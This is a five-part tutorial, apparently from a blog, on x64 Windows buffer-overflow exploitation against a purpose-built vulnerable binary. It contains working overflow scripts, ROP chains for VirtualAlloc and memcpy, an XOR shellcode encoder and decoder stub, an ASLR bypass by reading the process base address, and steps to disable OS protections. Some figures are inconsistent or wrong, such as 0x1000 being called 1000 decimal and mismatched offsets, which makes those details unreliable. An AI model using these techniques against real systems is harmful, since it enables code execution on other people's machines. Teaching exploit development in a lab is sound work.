Buffer Overflows in the Modern Era

Part One

Environment Setup & x64dbg Fundamentals

// Disabling protections, compiling the target, and manually controlling RIP

Learning Objectives

Disable Windows 11 Core Isolation and Exploit Protection for controlled learning
Compile the vulnerable binary with stack protections disabled using MinGW-w64
Navigate x64dbg — set breakpoints, step through instructions, inspect registers and stack
Manually redirect RIP to an unreachable function using the debugger
Understand why x64 buffer overflows use ROP rather than JMP RSP

The Challenge — x64 on Windows 11

Stack-based buffer overflows on x64 Windows 11 are a fundamentally different problem from the x86 exploits that filled offensive security courses for the past two decades. DEP is always-on at the hardware level. ASLR randomizes module base addresses every boot. Stack canaries are the default in modern compilers. The techniques that worked in 2010 crash immediately on a fully patched Windows 11 24H2 machine.

This series was born from a personal challenge: successfully exploit a buffer overflow on the latest fully-patched Windows 11, bypassing all modern mitigations. The answer is Return Oriented Programming (ROP) — reusing the program's existing instructions rather than injecting new code. This module sets up the environment and teaches the debugger before we touch any exploit code.

Step 1 — Disable Windows Protections for Learning

Before building the exploit we need a controlled environment. Parts 1–4 deliberately disable Windows security features so we can learn the core mechanics without fighting multiple protections at once. Part 5 re-enables everything and demonstrates ASLR bypass. This is the correct pedagogical order — learn the technique cleanly first, then add complexity.

Two locations to toggle off in Windows Security:

Navigate to: Windows Security → Device Security → Core Isolation → Core Isolation Details

Disable all toggles in this section including Memory Integrity. These features enforce integrity checks on code running in the kernel and restrict memory operations that our exploit will rely on. Disabling them for the learning environment does not permanently weaken your system — re-enable them after completing Parts 1–4.

⚠ Disabling Memory Integrity requires a reboot. You may see a notification in the taskbar warning that protection is reduced — this is expected during the lab phase.
Navigate to: Windows Security → App & Browser Control → Exploit Protection → System Settings

Disable DEP, ASLR, SEHOP, and all other protections listed. DEP (Data Execution Prevention) is the primary barrier — it prevents executing code on the stack. Even after disabling it here, hardware-level DEP (enforced by the NX bit on the CPU) may remain active. The series acknowledges this and addresses it in Part 3 using VirtualAlloc to create a separate RWX memory region rather than executing on the stack directly.

💡 Hardware DEP on modern x64 CPUs cannot be fully disabled by software settings alone. This is why the exploit uses VirtualAlloc + memcpy to move shellcode to a proper RWX region rather than attempting to execute directly from the stack.

Step 2 — The Vulnerable Binary

The target binary is purpose-built for this series. It includes several intentional design choices that make it exploitable and also provide the primitives we'll need for the full exploit chain:

      C++
      overflow.cpp — the vulnerable target binary
    
// overflow.cpp — g3tsyst3m
// Intentionally vulnerable binary for the buffer overflow series
// Compile: x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static

#include <windows.h>
#include <iostream>
#include <cstring>

// win_function() is intentionally never called by main()
// Goal: demonstrate controlling RIP by redirecting execution here
void win_function() {
    std::cout << "You have successfully exploited the program!\n";
    system("calc.exe");
}

void vulnerable_function() {
    char buffer[275];     // 275-byte buffer — no bounds checking
    std::cout << "Enter some input: ";
    std::cin >> buffer;  // UNSAFE: stops at whitespace, no length limit
}

int main() {
    // VirtualAlloc intentionally imported and called here so it appears
    // in the binary's import table — we'll resolve its address via x64dbg
    // and use it as a ROP chain target in later parts
    LPVOID mem = VirtualAlloc(NULL, 1024,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem) printf("Memory allocated at %p\n", mem);

    std::cout << "Welcome to the vulnerable program!\n";
    vulnerable_function();
    std::cout << "Goodbye!\n";
    return 0;
}

Compile Flags — What Each Does and Why It Matters

      Shell
      Compile command with explanation
    
x86_64-w64-mingw32-g++ -o overflow.exe overflow.cpp -fno-stack-protector -no-pie -static

# -fno-stack-protector
#   Disables stack canaries. Without this, GCC inserts a random value
#   between the buffer and the saved return address. If the canary is
#   overwritten, the program terminates before RIP can be hijacked.
#   With this flag: we can overwrite the return address freely.

# -no-pie
#   Disables Position Independent Executable — the compiler's form of ASLR.
#   A PIE binary loads at a random base address every run, making static
#   addresses in ROP chains invalid. With -no-pie: binary loads at a fixed
#   base (0x140000000), so our gadget addresses are stable across runs.
#   NOTE: We re-enable ASLR in Part 5 and solve it programmatically.

# -static
#   Links all libraries statically into the binary. This includes memcpy
#   and VirtualAlloc in the binary itself, giving us known, stable addresses
#   for both APIs without depending on DLL load order.

Basic x64dbg workflow for this series:
- File → Open → select overflow.exe to load it
- Run (F9) twice — first run executes to the entry point, second gets the program running
- Set breakpoint — double-click on an address in the disassembly panel to toggle a breakpoint (red highlight)
- Step Over (F8) — execute the current instruction without following calls into functions
- Step Into (F7) — follow a CALL instruction into the called function
- Registers panel (top right) — shows current value of all 64-bit registers; changed values highlight in red
- Stack panel (bottom right) — shows the stack contents at RSP; critical for watching ROP gadget execution
💡 On a laptop with Fn key: use Fn+F8 for step over and Fn+F7 for step into. The function key behavior varies by laptop manufacturer.
In x86 buffer overflows the classic technique is: overwrite EIP with the address of a JMP ESP gadget, place shellcode on the stack, and when EIP jumps to the gadget it executes JMP ESP which jumps directly into the shellcode on the stack.

This doesn't work in x64 for two reasons:
- DEP/NX: hardware-enforced non-executable stack. Even if you redirect RIP to the stack, the CPU raises a fault before executing any instruction there. This cannot be defeated by software settings.
- RIP canonicality: x64 RIP must contain a canonical address. After a buffer overflow, the value you see in RIP may not directly control execution the way EIP did in x86 — the next instruction is determined by what's on the stack and what RET pops.
ROP solves both: we chain together existing executable code snippets already in the binary (in read+execute memory, not the stack). Each gadget ends with RET, which pops the next gadget address from our controlled stack. No new code is executed on the stack — we're reusing what's already there.
Part 1 demonstrates debugger control before any exploit code. The workflow:
- Load overflow.exe in x64dbg and run it
- Find the address of win_function() in the disassembly — note it (around 0x14000158C)
- Set a breakpoint at the instruction after the std::cin call (0x1400015FB)
- Enter any input in the command prompt window
- Hit the breakpoint, then press F8 twice
- Double-click the RIP value in the register panel and type the address of win_function
- Press F8 to execute — calc.exe launches despite never being called by the program
This manual RIP manipulation is exactly what the buffer overflow automates in Part 2 — instead of typing in the address by hand, the overflow payload overwrites the return address on the stack so that when the function returns, it returns to win_function().

Part Two

The First Real Buffer Overflow — Controlling RIP with Python

// 296 bytes of junk, one struct.pack, and a calculator

Learning Objectives

Determine the exact byte offset needed to reach the return address (296 bytes)
Use Python's subprocess and struct modules to craft and deliver a buffer overflow payload
Attach x64dbg to a running process and verify stack control
Observe how the overflow reaches the return address without placing it directly in RIP

Finding the Offset — 296 Bytes

The buffer is declared as char buffer[275] but the overflow needs 296 bytes to reach the saved return address on the stack. The extra 21 bytes account for the function's stack frame overhead — saved registers, alignment padding, and the gap between the buffer start and the saved RIP location. Finding this value typically involves sending increasing amounts of data until the stack shows control at the return address position, or using a cyclic pattern tool like pwndbg's cyclic function.

Having written the vulnerable program ourselves gives the shortcut of knowing the buffer is 275 bytes — adding 20–30 bytes to find the exact offset is quick empirical work.

      Python
      overflow_part2.py — first working buffer overflow redirecting to win_function()
    
# overflow_part2.py — g3tsyst3m Part 2
# Sends 296 bytes of junk followed by the address of win_function()
# win_function() is at 0x14000158C — confirmed in x64dbg symbols view

import struct
import subprocess

# 296 bytes fills the buffer AND overwrites up to the saved return address
junk = 296
payload = b"\x41" * junk

# Append the address of win_function() in little-endian 64-bit format
# struct.pack("<Q", addr) = 8 bytes, little-endian unsigned 64-bit
# 0x14000158C is the address INSIDE win_function after stack alignment setup
# (not the very first instruction — skip past the stack alignment prologue)
payload += struct.pack("<Q", 0x14000158C)

process = subprocess.Popen(
    ["C:/path/to/overflow.exe"],   # update to your path
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE
)

# Pause to allow attaching x64dbg before sending payload
input("Attach overflow.exe to x64dbg, then press Enter...")

stdout, stderr = process.communicate(input=payload)
print(stdout.decode())
if stderr:
    print(stderr.decode())

Why We Don't See the Address in RIP

A common point of confusion for developers coming from x86: after the overflow, the address of win_function() does not appear in the RIP register. Instead, you'll see other registers (like RSP-relative values) showing 0x41414141 fill from the junk bytes. The overflow address is on the stack, waiting to be popped into RIP when the next RET instruction executes.

This is the fundamental shift from x86 thinking to x64 ROP thinking: stop watching RIP, watch the stack. RIP is just executing whatever the current RET pops. The attack surface is the stack contents, not RIP's current value.

The Python script pauses before sending the payload to allow attaching the debugger. In x64dbg:
- File → Attach (or Alt+A) → find overflow.exe in the process list → double-click
- x64dbg attaches and breaks. Your previously set breakpoints should still be active.
- Press F9 (Run) to let the process continue waiting for input
- Switch back to the Python terminal and press Enter to send the payload
- x64dbg should hit the breakpoint at 0x1400015FB
💡 The attach workflow is important because it mirrors real-world exploitation — you don't get to compile the target with debug symbols or control its launch. Attaching to a running process is the standard approach.
win_function() begins with stack alignment/setup instructions (function prologue). Since we're redirecting execution via a RET instruction rather than a CALL, the stack is already set up by the calling convention. Jumping to the very first instruction of a function that assumes CALL semantics can cause a stack misalignment crash.

0x14000158C is the address inside win_function() after the prologue — at the point where the actual work (printing and calling calc.exe) begins. The stack is already aligned at this point, so execution proceeds cleanly.

In later parts when we're building real ROP chains, this distinction becomes critical: ROP gadgets themselves don't have prologues — they're just mid-function code sequences ending in RET, and the stack state is whatever our ROP chain has constructed.
DEP (Data Execution Prevention) marks the stack as non-executable at the hardware level via the CPU's NX (No-Execute) bit. When the CPU attempts to execute an instruction at a non-executable memory address, it raises a hardware fault (#PF with execute-disable) before the instruction runs.

This is why the classic x86 technique — place shellcode in the buffer, redirect EIP/RIP to it — fails on modern Windows. Even if you successfully overwrite the return address to point into the buffer, the CPU refuses to execute from there.

The solution (covered in Part 3): use VirtualAlloc to allocate a new memory region with PAGE_EXECUTE_READWRITE permissions. The stack remains non-executable, but the newly allocated region is, and we copy our shellcode there with memcpy before jumping to it.

Part Three

ROP Chains — Building the VirtualAlloc Call

// Hunting gadgets, setting registers, defeating DEP without touching the stack

Learning Objectives

Use Ropper and ROPgadget to enumerate available gadgets in the vulnerable binary
Construct a ROP chain to set RCX, RDX, R8, and R9 for a VirtualAlloc call
Understand why some registers (R8, R9) require creative multi-gadget chains
Find the address of a specific constant value in memory using x64dbg's memory search
Chain gadgets to execute VirtualAlloc and allocate RWX memory for shellcode

What Are ROP Gadgets?

ROP (Return Oriented Programming) gadgets are short instruction sequences already present in the binary's executable sections, each ending with a RET instruction. Because they already exist in executable memory, DEP doesn't prevent their execution. By chaining their addresses on the stack, we control what code executes simply by controlling where each RET goes.

The goal here is to call VirtualAlloc(NULL, 1024, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) entirely through ROP — no shellcode, no executable stack. We need to set four registers to specific values:

      Python
      VirtualAlloc register requirements — what we need to build
    
# VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
# Windows x64 calling convention: RCX, RDX, R8, R9

RCX = 0x00000000   # lpAddress = NULL (OS chooses the address)
RDX = 0x000003E8   # dwSize    = 1000 (bytes — enough for shellcode)
R8  = 0x00003000   # flAllocationType = MEM_COMMIT | MEM_RESERVE
R9  = 0x00000040   # flProtect = PAGE_EXECUTE_READWRITE

Finding Gadgets — Ropper and ROPgadget

      Shell
      Dump all gadgets to text files for manual review
    
# Ropper — dumps all gadgets with their addresses
ropper -f overflow.exe >> ropgadgets_ropper.txt

# ROPgadget — alternative tool, useful for cross-validation
py ROPgadget.py --binary overflow.exe >> ropgadgets_rop.txt

# Both tools produce the same gadgets — use whichever you prefer
# Search the output file for patterns like:
#   grep "pop rax; ret" ropgadgets_ropper.txt
#   grep "xor ecx, ecx" ropgadgets_ropper.txt
#   grep "mov r8" ropgadgets_ropper.txt

Setting RCX = 0 (Easy)

The XOR ecx, ecx pattern — the canonical null-free zeroing technique — is the simplest register setup. Writing to ECX (32-bit) zero-extends into RCX (64-bit), so a single gadget is enough:

      Python
      RCX gadget — xor ecx, ecx; mov rax, r9; ret
    
# Found via: grep "xor ecx" ropgadgets_ropper.txt
# The "mov rax, r9" side effect is acceptable — we don't care about RAX here

payload += struct.pack("<Q", 0x14000276f)  # xor ecx, ecx; mov rax, r9; ret;
# RCX = 0 ✓

Setting RDX = 1002 (Moderate)

No direct mov rdx, 1000 gadget exists. The creative solution: find a pop rax; ret gadget, load the memory address where 0x1000 is stored in the binary (found via memory search in x64dbg), dereference it into RAX, then add it to EDX. The result is 1002 (2 + 1000) — more than enough allocation size:

      Python
      RDX gadget chain — creative multi-gadget value construction
    
# Memory search trick: in x64dbg, Memory Map → search for value 0x1000
# First result: address 0x1400000AC contains the DWORD value 0x1000
# We'll pop this address into RAX, then dereference it to get 1000 into RAX

payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← pops next value off stack into RAX
payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← RAX now = 0x140001f8c (addr of next gadget)
payload += struct.pack("<Q", 0x140001243)  # mov edx, 2; xor ecx, ecx; call rax;  ← EDX=2, ECX=0, calls pop rax again
payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;  ← pops next value into RAX
payload += struct.pack("<Q", 0x1400000AC)  # VALUE: this is the ADDRESS where 0x1000 lives in memory
payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;  ← dereference: RAX = 1000
payload += struct.pack("<Q", 0x140006995)  # add edx, eax; mov eax, edx; ret;  ← EDX = 2 + 1000 = 1002 ✓

Setting R8 = 0x3000 and R9 = 0x40 (Hard)

R8 and R9 are the most used sparingly in the binary's code, meaning few gadgets directly manipulate them. The solution involves routing values through RAX and RBX as intermediaries. R9 in particular is "hated" — it requires a gadget that also includes add rsp, 0x48, which advances the stack pointer by 72 bytes, requiring NOP sled padding in the chain to compensate:

      Python
      R9 gadget chain — the painful one (add rsp,48 requires NOP padding)
    
# R9 = 0x40 (PAGE_EXECUTE_READWRITE)
# Strategy: load 0x40 into RAX via memory dereference, move RAX→RBX,
# then use the only available "mov r9, rbx" gadget — which unfortunately
# also includes "add rsp, 0x48" that skips 72 bytes ahead on the stack.
# Compensate by padding 72+32=104 bytes of NOPs after the gadget address.

payload += struct.pack("<Q", 0x140001f8c)  # pop rax; ret;
payload += struct.pack("<Q", 0x140000018)  # address where 0x40 lives in the binary
payload += struct.pack("<Q", 0x140007678)  # mov eax, dword ptr [rax]; ret;  ← RAX = 0x40
payload += struct.pack("<Q", 0x140001b58)  # push rax; pop rbx; pop rsi; pop rdi; ret;  ← RBX = 0x40 (pops 2 extra values)
payload += b"\x90" * 16                       # padding for the 2 extra pops (rsi, rdi)
payload += struct.pack("<Q", 0x140007CA5)  # mov r9, rbx; [...]; add rsp,0x48; pop rbx/rsi/rdi/rbp; ret;
#                                               ↑ this gadget moves RSP forward 0x48 (72) bytes
#                                               and then pops rbx+rsi+rdi+rbp (32 more bytes)
#                                               total: 104 bytes of stack we need to pad over
payload += b"\x90" * 72                       # compensate for add rsp, 0x48
payload += b"\x90" * 32                       # compensate for pop rbx/rsi/rdi/rbp
# R9 = 0x40 ✓ (finally)

A key technique from Part 3: when you need to load a specific value into a register but can't find a mov reg, imm gadget, find a location in the binary's data section where that value already exists and use a memory dereference gadget (mov eax, dword ptr [rax]) to load it.

In x64dbg: Memory Map tab → right-click the binary's section → Search for Pattern → enter the hex value you need. The tool returns all addresses where that byte sequence appears. Pick the first result in the binary's own memory range (not a DLL).
- Value 0x1000 (1000 decimal for dwSize) was found at 0x1400000AC
- Value 0x0040 (0x40 = PAGE_EXECUTE_READWRITE) was found at 0x140000018
- Value 0x3000 (MEM_COMMIT|MEM_RESERVE) was found at 0x1400095AC
💡 This technique works because the compiler often embeds constant values from the source code into the binary's .text or .rdata sections. A statically linked binary is particularly rich because it includes the entire C runtime library with its own constants.
Real ROP chains almost never use gadgets that do exactly one thing. The reality is you work with whatever the binary provides. Common side effects and how to handle them:
- Extra POPs — a gadget that pops into registers you don't care about. Solution: pad those stack positions with junk values (0x90909090 works well as it's a NOP sled in x86, harmless as a value).
- add rsp, N — advances the stack pointer, skipping over N bytes of your carefully laid chain. Solution: pad those N bytes with NOPs after the gadget address in your payload.
- Clobbering registers — a gadget that sets a register you already set. Solution: order your gadgets carefully — set the clobbered register after the gadget that clobbers it.
- CALLs inside gadgets — some gadgets include a CALL that returns to RSP. Solution: ensure the call target (usually another ROP gadget address already in RAX) is already set up before the gadget runs.
This creativity is what makes ROP chain development genuinely difficult. It's less programming and more puzzle-solving with the specific pieces available in your binary.

Part Four

Shellcode Encoding, memcpy Chain & Full Exploit

// XOR encoding + decoder stub + memcpy ROP = working shellcode execution

Learning Objectives

Understand why std::cin requires encoding — bad characters that break payload delivery
XOR-encode shellcode with key 0xAC and embed a self-decoding stub
Build a ROP chain to call memcpy and copy shellcode from stack to the VirtualAlloc'd region
Understand the NOP sled's role in the final payload layout
Assemble the complete exploit: shellcode + padding + ROP chain for VirtualAlloc + memcpy

The Bad Character Problem

std::cin >> buffer stops reading at whitespace characters (0x20, 0x09, 0x0A, 0x0D) and null bytes (0x00). This means any shellcode or ROP gadget address containing these bytes will truncate the payload. The solution is XOR encoding: transform every byte so none of the problematic values appear in the payload, then include a decoder stub that restores the original bytes at runtime before execution.

XOR Encoding with Key 0xAC

The key 0xAC was chosen because XOR-ing the shellcode bytes with it produces no bad characters. The encoded payload is safe to send through std::cin. At runtime, the decoder stub XORs each byte back with 0xAC to restore the original shellcode before jumping to it.

      Python
      xor_encoder.py — encode shellcode with key 0xAC to remove bad characters
    
# The raw calc.exe shellcode (207 bytes, no nulls — from the shellcoding module)
# This is the IAT-walking WinExec shellcode targeting "calc.exe"
shellcode  = b"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b"
shellcode += b"\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89"
# ... (full 207-byte shellcode)

xor_key = 0xAC   # chosen: avoids bad chars (0x00, 0x20, 0x09, 0x0A, 0x0D)

encoded = bytearray()
for byte in shellcode:
    encoded.append(byte ^ xor_key)

# Verify: no bad chars in the encoded output
bad_chars = [0x00, 0x20, 0x09, 0x0a, 0x0d]
for b in encoded:
    if b in bad_chars:
        print(f"BAD CHAR FOUND: 0x{b:02x}")

print(f"Encoded: {encoded.hex()}")
print(f"Length: {len(encoded)} bytes")

The Decoder Stub

The decoder stub is a small assembly routine prepended to the encoded shellcode. It XORs each byte back with the key at runtime, restoring the original shellcode in-place before jumping to it. This stub must itself be written in bytes that are safe to deliver — no bad characters in the stub encoding either.

      x64 Assembly
      decoder_stub.asm — XOR decoder prepended to encoded shellcode
    
; decoder_stub — g3tsyst3m Part 4
; Prepended to the XOR-encoded shellcode. Decodes in-place at runtime.
; Bad-char free: no 0x00, 0x20, 0x09, 0x0A, 0x0D in the assembled bytes.

xor  rcx, rcx                      ; RCX = 0 (loop counter)
lea  rsi, [rip + FFFFFFFFFEBFDE09h]   ; null-free way to build shellcode base address
add  esi, 02222222h               ; adjust RSI to point to encoded shellcode start
mov  rbx, rsi                      ; RBX = base (save for later jump)
lea  rsi, [rsi]                    ; RSI = pointer to current byte
mov  cl,  0CFh                     ; RCX = length of encoded shellcode (207 bytes)
mov  al,  0ACh                     ; AL = XOR key (0xAC)

decode_loop:
xor  byte ptr [rsi], al           ; XOR one byte: decode it
inc  rsi                          ; advance pointer
dec  rcx                          ; decrement counter
jne  decode_loop                 ; repeat until all bytes decoded
; fall through to decoded shellcode (starts immediately after this stub)

memcpy ROP Chain — Copying Shellcode Off the Stack

After VirtualAlloc returns (the allocated address is in RAX), we chain into memcpy to copy the encoded shellcode from the stack into the RWX region. memcpy uses RCX (dst), RDX (src), R8 (size). The destination is the VirtualAlloc'd address (returned in RAX after the VirtualAlloc call). Source is the stack address where our shellcode sits. Size is 251 bytes (decoder stub + encoded shellcode).

      Python
      Final payload layout — complete exploit structure
    
# Complete payload structure for Part 4 (no ASLR)
# All addresses use 0x140000000 base (fixed, ASLR disabled)

# ─── SECTION 1: NOP sled + Decoder stub + Encoded shellcode ─────────────────
# This goes at the START of the payload so it lands on the stack
# The ROP chain will use memcpy to COPY this section to the VirtualAlloc'd region
payload  = b"\x90" * 8                          # NOP sled (8 bytes)
payload += decoder_stub                         # XOR decoder (35 bytes)
payload += encoded_shellcode                    # encoded calc shellcode (207 bytes)
#                                               total so far: 250 bytes of shellcode

# ─── SECTION 2: Padding to reach return address ──────────────────────────────
payload += b"\x41" * 45                        # 45 bytes to reach offset 296

# ─── SECTION 3: ROP chain ────────────────────────────────────────────────────
# R9 gadgets (0x40 = PAGE_EXECUTE_READWRITE) — set first because chain is longest
payload += struct.pack("<Q", 0x140001f8c)   # pop rax; ret;
payload += struct.pack("<Q", 0x140000018)   # addr of 0x40
payload += struct.pack("<Q", 0x140007678)   # mov eax,[rax]; ret;
payload += struct.pack("<Q", 0x140001b58)   # push rax; pop rbx; pop rsi; pop rdi; ret;
payload += b"\x90" * 16                        # compensate rsi/rdi pops
payload += struct.pack("<Q", 0x140007CA5)   # mov r9,rbx; [add rsp,48]; pop rbx/rsi/rdi/rbp; ret;
payload += b"\x90" * (72+32)                  # compensate add rsp,48 + 4 extra pops

# R8 gadgets (0x3000 = MEM_COMMIT|MEM_RESERVE)
# ... (R8 chain — see Part 3)

# RCX = 0 (lpAddress = NULL)
payload += struct.pack("<Q", 0x14000276f)   # xor ecx, ecx; mov rax, r9; ret;

# RDX = 1002 (dwSize)
# ... (RDX chain — see Part 3)

# Call VirtualAlloc!
payload += struct.pack("<Q", 0x140001f8c)   # pop rax; ret;
payload += struct.pack("<Q", 0x140007D78)   # VirtualAlloc import address
payload += struct.pack("<Q", 0x140001fb3)   # jmp qword ptr [rax];  ← CALL VirtualAlloc ✓

# ─── SECTION 4: memcpy ROP chain ──────────────────────────────────────────────
# After VirtualAlloc: RAX = new RWX memory address
# memcpy(dst=RAX, src=stack_ptr_to_shellcode, size=251)
# RCX=dst, RDX=src, R8=size
# ... (memcpy chain)

# ─── SECTION 5: Jump to decoded shellcode ─────────────────────────────────────
# After memcpy: RAX = VirtualAlloc'd region (contains our decoded shellcode)
# Jump to it!
payload += struct.pack("<Q", 0x14000192f)   # jmp rax;  ← execute shellcode in RWX region ✓

A NOP sled (\x90 bytes) is placed before the decoder stub in the payload. Its purpose: when the memcpy copies the shellcode section to the RWX region and we jump to it, slight imprecision in the jump target address (due to register arithmetic approximation in the ROP chain) might land a few bytes before or after the exact decoder stub start. The NOP sled provides a "landing strip" — any of the 8 NOPs will slide execution forward to the decoder stub.

8 bytes of NOP sled is minimal but sufficient given how the RDX (source pointer) is calculated from known stack offsets. Longer NOP sleds provide more tolerance for imprecision at the cost of payload size.

💡 NOP sleds are also useful in x64 debugging — if your shellcode doesn't execute, step through the jump target in x64dbg. If you see a solid block of 0x90 instructions being executed, your landing is correct. If you see garbage, the source pointer calculation is off.
The trickiest part of the memcpy chain: figuring out RDX (the source address — where on the stack does our shellcode actually live?). The stack address at the time of the overflow is predictable relative to the stack state after the ROP chain starts.

The approach used: RSP points near the start of the ROP chain after the overflow. The shellcode is located at a known negative offset from RSP (it was placed before the junk padding). By tracking how RSP changes through each ROP gadget (each pop and ret advances RSP by 8, each push decreases it), you can calculate the exact offset and add it to the current RSP value to get the shellcode's address.

The blog series uses: add edx, eax where EAX holds the RSP-relative offset (calculated empirically from x64dbg observation) to set RDX to the shellcode's stack address. This is why the Part 4 payload has a specific pre-calculated value for the source pointer — it was determined by stepping through the exploit in x64dbg and reading the actual stack address.
The calc.exe payload used in this exploit is the same IAT-walking shellcode from the x64 Assembly and Shellcoding course — 207 bytes, fully NULL-free, dynamically resolving WinExec from kernel32.dll's export table at runtime via the PEB walk technique.

This is why the shellcoding course matters for exploit development: you need payloads that work without knowing exact DLL load addresses at compile time. The IAT-walking approach works regardless of ASLR because it resolves API addresses dynamically at runtime, not at exploit-construction time.

The XOR encoding adds another layer: even though the shellcode itself is NULL-free, std::cin imposes additional bad character restrictions. The 0xAC key was specifically chosen by iterating over possible keys until one produced no bad characters in the encoded output.

Part Five

Defeating ASLR — Runtime Base Address Discovery

// Re-enable everything. Now bypass it.

Learning Objectives

Understand exactly what ASLR randomizes — and what it doesn't
Use Python's psutil and ctypes to programmatically retrieve the base address of a running process
Calculate dynamic ROP gadget addresses by adding fixed offsets to the runtime base
Re-enable all Windows 11 security features and run the full working exploit

Re-Enable All Protections — The Real Challenge Begins

For Part 5, re-enable everything that was disabled for Parts 1–4:

→ Core Isolation (all options including Memory Integrity)
→ Exploit Protection (DEP, ASLR, SEHOP, all system settings)
→ Secure Boot (verify in BIOS/UEFI settings)

With everything re-enabled, the Part 4 exploit fails immediately — the hardcoded 0x140001f8c addresses are now wrong because ASLR has randomized the binary's base address. The fix is straightforward: stop hardcoding addresses and discover them at runtime.

What ASLR Actually Randomizes

The key insight that makes ASLR bypassable here: ASLR randomizes the base address (the first half of the address), but the offset within the module (the second half) remains constant. A gadget at 0x140001f8c with ASLR disabled becomes, say, 0x00d8001f8c with ASLR enabled — only the upper portion changed. The 1f8c offset is always the same relative to the module base.

This means all our ROP gadget addresses can be expressed as base_addr + offset. We just need to discover base_addr at runtime, and we can reconstruct every gadget address dynamically.

      Python
      get_base_address.py — runtime module base discovery via EnumProcessModulesEx
    
# get_base_address.py — g3tsyst3m Part 5
# Discovers the runtime base address of overflow4.exe using Win32 API
# Requires: pip install psutil

import ctypes
import psutil
import subprocess

def get_pid_by_name(process_name):
    for proc in psutil.process_iter(attrs=['pid', 'name']):
        if proc.info['name'].lower() == process_name.lower():
            return proc.info['pid']
    return None

def get_base_address(pid):
    PROCESS_QUERY_INFORMATION = 0x0400
    PROCESS_VM_READ           = 0x0010

    h_process = ctypes.windll.kernel32.OpenProcess(
        PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid
    )
    if not h_process: return None

    h_modules = (ctypes.c_void_p * 1024)()
    needed    = ctypes.c_ulong()

    if ctypes.windll.psapi.EnumProcessModulesEx(
        h_process, ctypes.byref(h_modules),
        ctypes.sizeof(h_modules), ctypes.byref(needed), 0x03
    ):
        base = h_modules[0]   # first module = main executable
        ctypes.windll.kernel32.CloseHandle(h_process)
        return base

    ctypes.windll.kernel32.CloseHandle(h_process)
    return None

# Launch the vulnerable binary
process = subprocess.Popen(["./overflow4.exe"],
    stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

pid = get_pid_by_name("overflow4.exe")
if pid:
    base_addr = get_base_address(pid)
    print(f"[+] Base address: {hex(base_addr)}")
    # Now use base_addr + static_offset for every ROP gadget:
    # payload += struct.pack("<Q", base_addr + 0x1f8c)  # pop rax; ret;
    # payload += struct.pack("<Q", base_addr + 0x276f)  # xor ecx, ecx; ret;
    # ... etc for all gadgets

Converting Static Addresses to Dynamic

The only change to the Part 4 exploit is replacing every hardcoded 0x14000XXXX address with base_addr + 0xXXXX. The offsets (the last four hex digits) never change regardless of ASLR. With base_addr discovered at runtime, every ROP gadget is recalculated correctly for the current run.

      Python
      Dynamic gadget addresses — before vs after ASLR bypass
    
# BEFORE (Parts 1-4, ASLR disabled) — hardcoded base 0x140000000:
payload += struct.pack("<Q", 0x140001f8c)   # pop rax; ret;
payload += struct.pack("<Q", 0x14000276f)   # xor ecx, ecx; mov rax, r9; ret;
payload += struct.pack("<Q", 0x140007678)   # mov eax, dword ptr [rax]; ret;
payload += struct.pack("<Q", 0x140007D78)   # VirtualAlloc import address

# AFTER (Part 5, ASLR enabled) — base_addr discovered at runtime:
payload += struct.pack("<Q", base_addr+0x1f8c)  # pop rax; ret;  [same gadget, dynamic base]
payload += struct.pack("<Q", base_addr+0x276f)  # xor ecx, ecx; mov rax, r9; ret;
payload += struct.pack("<Q", base_addr+0x7678)  # mov eax, dword ptr [rax]; ret;
payload += struct.pack("<Q", base_addr+0xD288)  # VirtualAlloc import address

# The offset values (0x1f8c, 0x276f, etc.) are IDENTICAL.
# Only the base changes. That's all ASLR bypass requires in this context.

ASLR randomizes the module base address — the starting VA where the executable or DLL is mapped. It does not change the relative layout within the module. Every function, every instruction, every ROP gadget is at a fixed position relative to the base.

The randomization in practice: on 64-bit Windows, only bits 17–28 (or similar — the exact range depends on the OS version) of the base address are randomized. This provides roughly 2^12 = 4096 possible positions for any module, which is relatively weak compared to full 64-bit randomization. In this series, even those randomized bits are defeated by reading the base address directly from the running process.

⚠ The ability to read the base address from the process using OpenProcess requires the exploit code to be running in the same user context as the target. In a remote exploitation scenario (over a network), base address leakage requires a separate information-disclosure vulnerability.
The binary in Parts 1–4 was compiled with -no-pie (no Position Independent Executable). Part 5 re-enables Windows ASLR but keeps the binary compiled with -no-pie. This is the scenario where "a developer forgot to compile with full security hardening."

A fully PIE binary would require a different approach since the binary's internal layout relative offsets can also shift. The key difference:
- -no-pie with ASLR: binary may still be moved by ASLR to a random base. The internal offsets (gadget addresses relative to base) remain fixed. Our approach works.
- Full PIE + ASLR: both the base address and potentially other layout aspects are randomized. Defeating this typically requires an information leak (a way to read an address from the binary's memory) to compute gadget addresses at runtime.
💡 In real-world exploitation, information disclosure vulnerabilities (format string bugs, use-after-free with leak, etc.) are often combined with memory corruption bugs precisely to defeat PIE+ASLR. The "leak first, then exploit" pattern is fundamental to modern binary exploitation.
The complete payload structure for the final Part 5 exploit (all protections enabled):
- Position 0–249: NOP sled (8) + decoder stub (35) + encoded shellcode (207) = 250 bytes
- Position 250–295: 46 bytes of padding to reach return address offset (296)
- Position 296+: ROP chain begins (each gadget = 8 bytes):
1. R9 gadget chain (set to 0x40) + NOP padding for stack skip
2. R8 gadget chain (set to 0x3000)
3. RCX gadget (set to 0)
4. RDX gadget chain (set to 1002)
5. VirtualAlloc call via jmp [rax]
6. memcpy setup — R8 (size), RCX (dest from VirtualAlloc return), RDX (stack source)
7. memcpy call
8. jmp rax → execute decoded shellcode in RWX region
Total payload: approximately 700–900 bytes depending on NOP padding amounts for the R9 chain. Fits within typical buffer overflow scenarios.
